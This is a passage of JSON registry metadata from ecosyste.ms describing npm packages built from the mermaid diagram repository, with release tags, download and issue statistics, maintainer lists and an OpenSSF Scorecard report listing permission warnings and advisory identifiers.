.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:51.257Z","dependent_packages_count":0,"downloads":126,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":14.760108844690492,"dependent_repos_count":18.771269487413488,"dependent_packages_count":27.016536808041597,"stargazers_count":0.07668154704264632,"forks_count":0.4938606344656622,"average":12.223691464330777},"purl":"pkg:npm/fork-mermaid","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/fork-mermaid","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/fork-mermaid","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/fork-mermaid/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/fork-mermaid/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/fork-mermaid/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/fork-mermaid/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/fork-mermaid/related_packages","maintainers":[{"uuid":"blueking","login":"blueking","name":null,"email":"contactus_bk@tencent.com","url":null,"packages_count":141,"html_url":"https://www.npmjs.com/~blueking","role":null,"created_at":"2023-04-29T14:07:49.127Z","updated_at":"2023-04-29T14:07:49.127Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/blueking/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11095797,"name":"@ted-marozzi/layout-elk","ecosystem":"npm","description":"ELK layout engine for mermaid","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","elk","mermaid"],"namespace":"ted-marozzi","versions_count":8,"first_release_published_at":"2024-11-29T10:31:31.399Z","latest_release_published_at":"2024-11-29T23:33:11.593Z","latest_release_number":"0.1.5-pro.9","last_synced_at":"2025-09-01T12:55:59.523Z","created_at":"2024-11-29T12:29:55.025Z","updated_at":"2025-09-01T14:17:51.327Z","registry_url":"https://www.npmjs.com/package/@ted-marozzi/layout-elk","install_command":"npm install @ted-marozzi/layout-elk","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"0.1.5-pro.9"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/